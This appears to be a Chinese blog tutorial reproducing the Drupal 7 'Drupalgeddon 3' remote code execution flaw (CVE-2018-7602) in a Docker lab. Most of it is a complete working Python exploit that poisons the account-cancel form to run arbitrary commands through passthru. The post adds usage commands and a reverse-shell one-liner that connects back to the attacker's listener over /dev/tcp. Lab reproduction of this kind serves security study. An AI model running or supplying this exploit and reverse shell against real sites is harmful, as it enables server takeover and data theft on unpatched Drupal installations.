漏洞复现-Drupal Drupalgeddon 3 后台远程代码执行漏洞(CVE-2018-7602)

原创 已于 2025-09-22 16:11:56 修改 · 384 阅读 · 6 ·
CC 4.0 BY-SA版权
我是Alsn,那半个橘子是海上遇到大雨时侯的明亮橘色灯塔!
文章标签:

#笔记

于 2025-06-25 22:16:42 首次发布

漏洞复现-Drupal Drupalgeddon 3 后台远程代码执行漏洞(CVE-2018-7602)

漏洞描述

Drupal Core 7.x 和 8.x 版本中存在远程代码执行漏洞(CVE-2018-7602)。攻击者通过两次 URL 编码 # 字符绕过 sanitize() 函数过滤,导致远程代码执行。

环境搭建

1. 启动漏洞环境

docker compose up -d
  • 容器启动后,访问 http://your-ip:8080(将 your-ip 替换为宿主机 IP)。
  • 你将看到 Drupal 的安装页面。

2. 完成 Drupal 安装

  • 数据库配置:选择 SQLite(环境默认配置,无需 MySQL)。
  • 使用默认配置完成安装,并记录管理员账户信息(如用户名 drupal 和密码 drupal)。
    在这里插入图片描述在这里插入图片描述

3. 访问首页

  • 安装完成后,访问 http://your-ip:8080 查看 Drupal 首页。

在这里插入图片描述

漏洞复现

1. PoC 脚本

drupa7-CVE-2018-7602.py

#!/usr/bin/env python3

import requests
import argparse
from bs4 import BeautifulSoup

def get_args():
  parser = argparse.ArgumentParser( prog="drupa7-CVE-2018-7602.py",
                    formatter_class=lambda prog: argparse.HelpFormatter(prog,max_help_position=50),
                    epilog= '''
                    This script will exploit the (CVE-2018-7602) vulnerability in Drupal 7 <= 7.58
                    using an valid account and poisoning the cancel account form (user_cancel_confirm_form) 
                    with the 'destination' variable and triggering it with the upload file via ajax (/file/ajax).
                    ''')

  parser.add_argument("user", help="Username")
  parser.add_argument("password", help="Password")
  parser.add_argument("target", help="URL of target Drupal site (ex: http://target.com/)")
  parser.add_argument("-c", "--command", default="id", help="Command to execute (default = id)")
  parser.add_argument("-f", "--function", default="passthru", help="Function to use as attack vector (default = passthru)")
  parser.add_argument("-x", "--proxy", default="", help="Configure a proxy in the format http://127.0.0.1:8080/ (default = none)")
  args = parser.parse_args()
  return args

def pwn_target(target, username, password, function, command, proxy):
  requests.packages.urllib3.disable_warnings()
  session = requests.Session()
  proxyConf = {'http': proxy, 'https': proxy}
  try:
    print('[*] Creating a session using the provided credential...')
    get_params = {'q':'user/login'}
    post_params = {'form_id':'user_login', 'name': username, 'pass' : password, 'op':'Log in'}
    print('[*] Finding User ID...')
    session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    get_params = {'q':'user'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    user_id = soup.find('meta', {'property': 'foaf:name'}).get('about')
    if ("?q=" in user_id):
      user_id = user_id.split("=")[1]
    if(user_id):
      print('[*] User ID found: ' + user_id)
    print('[*] Poisoning a form using \'destination\' and including it in cache.')
    get_params = {'q': user_id + '/cancel'}
    r = session.get(target, params=get_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_token = form.find('input', {'name': 'form_token'}).get('value')
    get_params = {'q': user_id + '/cancel', 'destination' : user_id +'/cancel?q[%23post_render][]=' + function + '&q[%23type]=markup&q[%23markup]=' + command }
    post_params = {'form_id':'user_cancel_confirm_form','form_token': form_token, '_triggering_element_name':'form_id', 'op':'Cancel account'}
    r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
    soup = BeautifulSoup(r.text, "html.parser")
    form = soup.find('form', {'id': 'user-cancel-confirm-form'})
    form_build_id = form.find('input', {'name': 'form_build_id'}).get('value')
    if form_build_id:
        print('[*] Poisoned form ID: ' + form_build_id)
        print('[*] Triggering exploit to execute: ' + command)
        get_params = {'q':'file/ajax/actions/cancel/#options/path/' + form_build_id}
        post_params = {'form_build_id':form_build_id}
        r = session.post(target, params=get_params, data=post_params, verify=False, proxies=proxyConf)
        parsed_result = r.text.split('[{"command":"settings"')[0]
        print(parsed_result)
  except:
    print("ERROR: Something went wrong.")
    raise

def main():
  print ()
  print ('===================================================================================')
  print ('|   DRUPAL 7 <= 7.58 REMOTE CODE EXECUTION (SA-CORE-2018-004 / CVE-2018-7602)     |')
  print ('|                                   by pimps                                      |')
  print ('===================================================================================\n')

  args = get_args() # get the cl args
  pwn_target(args.target.strip(),args.user.strip(),args.password.strip(), args.function.strip(), args.command.strip(), args.proxy.strip())


if __name__ == '__main__':
  main()

2. 执行漏洞利用

运行 PoC 脚本,替换以下参数:

  • -c "id":执行系统命令 id(可替换为其他命令)。
  • root:管理员用户名。
  • root:管理员密码。
  • http://your-ip:8080/:目标 URL。
python3 drupa7-CVE-2018-7602.py -c "id" root root http://your-ip:8080/
参数说明:
  • -c:指定要执行的命令。
  • 脚本会自动处理 URL 编码和认证流程。

3. 观察结果

  • 成功时,脚本会返回命令执行结果(如 uid=...):
    uid=...(当前用户信息)

- 截图示例(参考你的 ):

扩展利用

1. 执行其他命令

id 替换为其他系统命令(如 ls /):

python3 drupa7-CVE-2018-7602.py -c "ls /" drupal drupal http://your-ip:8081/

在这里插入图片描述
在这里插入图片描述

2. 反弹 Shell(高级利用)

通过漏洞反弹一个交互式 Shell(需目标允许出站连接):

python3 drupa7-CVE-2018-7602.py -c "bash -c 'bash -i >& /dev/tcp/your-ip/4444 0>&1'" root root http://your-ip:8081/
  • 说明:替换 your-ip 和端口为你的监听地址(需提前用 nc -lvnp 4444 监听)。

注意事项

  1. 仅限授权测试:此环境仅用于本地安全研究,禁止非法攻击。
  2. 清理环境:测试完成后销毁容器:
    docker compose down
  3. 防御建议:升级到 Drupal 官方修复版本(≥ 7.59、≥ 8.5.3)。
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
vulhub通关实战一(附docker vulhub 虚拟机环境)
悦分享
12-26 2320
docker vulhub 虚拟机环境:docker-compose up -d 启动服务:登录7001端口用户名weblogic,密码Oracle@123
Drupal XSS漏洞CVE-2019-6341)
EC_Carrot的博客
05-28 542
漏洞背景 DrupalDrupal社区的一套使用PHP语言开发的开源内容管理系统。 Drupal 7.65之前的7版本、8.6.13之前的8.6版本和8.5.14之前的8.5版本中存在跨站脚本漏洞。该漏洞源于WEB应用缺少对客户端数据的正确验证。攻击者可利用该漏洞执行客户端代码。 漏洞分析 详细分析可以参考:https://paper.seebug.org/897/ 漏洞复现漏洞需要利用drupal文件模块上传文件的漏洞,伪造一个图片文件,上传,文件的内容实际是一段HTML代码,内嵌JS,这样其他用户
vulhub学习文档-Drupal XSS漏洞
ploto_cs的博客
09-11 1365
Drupal XSS漏洞 一.漏洞介绍 (一)编号 CVE-2019-6341 (二)概述 Drupal诞生于2000年,是一个基于PHP语言编写的开发型CMF(内容管理框架)。在某些情况下,通过文件模块或者子系统上传恶意文件触发XSS漏洞。 (三)影响版本 在7.65之前的Drupal 7版本中; 8.6.13之前的Drupal 8.6版本; 8.5.14之前的Drupal 8.5版本。 (四)漏洞要求 <= Durpal 8.6.6 服务端开启评论配图或者攻击者拥有author以上权限的账号 被
Drupal远程代码执行漏洞CVE-2018-7600)
ANOrange的博客
04-10 1473
DrupalDrupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。Drupal中带有默认或通用模块配置的多个子系统存在安全漏洞远程攻击者可利用该漏洞执行任意代码。通过对比官方的补丁,可以得知是请求中存在 # 开头的参数。Drupal Render API 对于 # 有特殊处理。
DRUPAL 8.x远程代码执行漏洞(CVE-2018-7600)
errorr0
07-28 3830
drupal命令执行
【bWAPP】SQL注入实战
「我唯一会的和擅长的只有网络安全,如果我不能在我最擅长的事情上取得成功,那么我根本不知道,我的人生还有什么意义。」
12-16 1857
我生来就是高山而非溪流 ,我欲于群峰之巅俯视平庸的沟壑。我生来就是人杰而非草芥,我站在伟人之肩藐视卑微的懦夫!
Drupal远程代码执行漏洞CVE-2019-6339)
weixin_46411728的博客
08-25 3202
Drupal 远程代码执行漏洞CVE-2019-6339)
Drupal 远程代码执行漏洞CVE-2019-6339)
limb0的博客
07-04 9401
Drupal 远程代码执行漏洞CVE-2019-6339) 一、漏洞介绍 Drupal core是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 Drupal core 7.62之前的7.x版本、8.6.6之前的8.6.x版本和8.5.9之前的8.5.x版本中的内置phar stream wrapper(PHP)存在远程代码执行漏洞远程攻击者可利用该漏洞执行任意的php代码。 二、漏洞危害 远程代码执行。 三、漏洞验证 环境搭建: 实验环境 系统 IP地址 攻击
Drupal漏洞Drupal 7.31 SQL漏洞
2301_77778745的博客
04-25 849
1.通过python调用drupal7.x.py脚本对数据库进行注入。test test(后面两个test是新设的用户名和密码)2.输入命令:python drupal7.x.py。
内容管理系统Drupal提出重大安全漏洞
weixin_34311757的博客
02-23 454
2019独角兽企业重金招聘Python工程师标准>>> ...
Drupal Drupalgeddon 2 未授权远程代码执行漏洞CVE-2018-7600)
最新发布
sucker的博客
04-21 1147
环境启动后,访问http://your-ip:8080/将会看到Drupal的安装页面。漏洞的触发点在 Drupal 的 AJAX 渲染机制中,攻击者可以通过设置 _drupal_ajax=1 参数,强制 Drupal 以 AJAX 模式执行表单渲染流程,此流程中会解析并渲染用户提交的数据。Drupal 渲染表单元素的核心流程中会检测是否存在 #post_render、#markup 等字段,如果存在,则会调用其中。Drupal 没有对这些 # 开头的特殊字段做适当的白名单校验,导致攻击者可以。
漏洞复现Drupal 远程代码执行漏洞(CVE-2018-7600)
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
08-12 1191
Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成该漏洞的产生的根本原因在于Drupal对表单的渲染上,攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码,最后完全控制被攻击的网站。...
Drupal-CVE-2018-7600漏洞(远程代码执行)
tiay__的博客
12-25 994
漏洞产生的原因在于Drupal对表单渲染时未进行严格的安全过滤,导致攻击者可以利用该漏洞攻击Drupal系统的网站,执行恶意代码。
漏洞分析】Drupal 远程代码执行CVE-2017-6920)
蚁景网安学院
07-13 976
前几天在参加 FOFA-攻防挑战赛时,遇到了 Drupal 的盲盒漏洞环境,最终确定漏洞CVE-2017-6920 ,但是还是无法 getflag ,因为网上相关参考文章并不是很多,大多都只是简单的复现了,于是就想着对这个漏洞进行一个详细的分析......
Drupal 7.31版本最新漏洞利用个人完整总结,共享出来(附上利用源码)
kikaylee的专栏
10-23 8667
10月16日有国外安全研究人员在Twitter上曝出了Drupal 7.31版本的最新SQL注入漏洞,并给出了利用测试的EXP代码,小编在本地搭建Drupal7.31的环境,经过测试,发现该利用代码可成功执行并在数据库中增加一个攻击者自定义的用户。
漏洞复现-Drupal远程代码执行漏洞CVE-2018-7602
qq_45751902的博客
10-23 2776
的多个子系统中存在一个远程执行代码漏洞。这可能允许攻击者利用 Drupal 站点上的多个攻击媒介,从而导致该站点受到威胁。此漏洞Drupal 核心 - 高度关键 - 远程代码执行 - SA-CORE-2018-002 有关。SA-CORE-2018-002 和此漏洞都在野外被利用。-c 后面接命令,紧随账号,密码。
drupal远程代码执行 (CVE-2018-7600)漏洞学习与复现
seek_2022的博客
12-17 6886
CVE-2018-7600漏洞学习与复现
搭建Drupal远程代码执行漏洞环境(CVE-2019-6340)
资源摘要信息:"Drupal Core RESTful远程代码执行漏洞(CVE-2019-6340)" 知识点一:Drupal简介 Drupal是一个开源的内容管理系统(CMS),用于构建网站和应用程序。它由PHP语言编写,并且适用于各种不同的网站,包括...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值